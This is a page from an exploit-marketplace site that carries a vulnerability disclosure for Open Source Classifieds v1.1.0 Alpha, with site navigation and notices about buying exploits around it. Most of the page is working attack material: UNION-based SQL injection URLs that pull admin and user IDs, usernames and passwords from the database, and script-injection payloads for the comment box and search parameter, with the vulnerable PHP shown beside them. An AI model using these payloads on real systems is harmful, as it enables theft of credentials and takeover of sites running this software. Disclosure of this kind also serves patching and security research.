0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Open Source Classifieds v1.1.0 Alpha (OSClassi) Mult Vulnerabilities
[====================================================================
Open Source Classifieds v1.1.0 Alpha (OSClassi) Mult Vulnerabilities
====================================================================
__ _ __ _
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___
\ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
========================================================================================
Open Source Classifieds (OSClassi) SQLi/Xss/Arbitrary Admin Change Multi Vulnerabilities
----------------------------------------------------------------------------------------
- Site : http://osclass.org/
- Download : http://sourceforge.net/projects/osclass/files/
- Author : Sioma Labs
- Version : 1.1.0 Alpha
- Tested on : WIndows XP SP2 (WAMP)
[-------------------------------------------------------------------------------------------------------------------------]
MYSQL Injection
===============
POC
http://server/item.php?id=[SQLi]
Basic Info
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(CHAR(32,58,32),user(),database(),version())--
Admin ID,Username,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from oc_admin--
User ID,UserName,Password
http://server/item.php?id=-1 UNION SELECT 1,2,3,4,5,6,group_concat(id,0x3a,username,0x3a,password)+from+oc_user--
[-------------------------------------------------------------------------------------------------------------------------]
Cross Site Scripting
====================
Xss Source Review (item.php)
------------------------------
1st Xss item.php
[+] To Work This You need to Have A iteam already posted (http://server/item.php?action=post)
------------------------------
case 'add_comment':
dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')",
DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
header('Location: item.php?id=' . $_POST['id']);
break;
case 'post':
------------------------------
[+] Put This c0de in to the comment box
"><script>alert(String.fromCharCode(88, 83, 83));</script>
-------------------------------
2nd Xss (search.php)
---------------------------------
$pattern = $_GET['pattern'];
--------------------------------
POC
http://server/search.php?pattern=[Xss]
Exploit
http://server/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>
[-------------------------------------------------------------------------------------------------------------------------]
# 0day.today [2024-10-06] #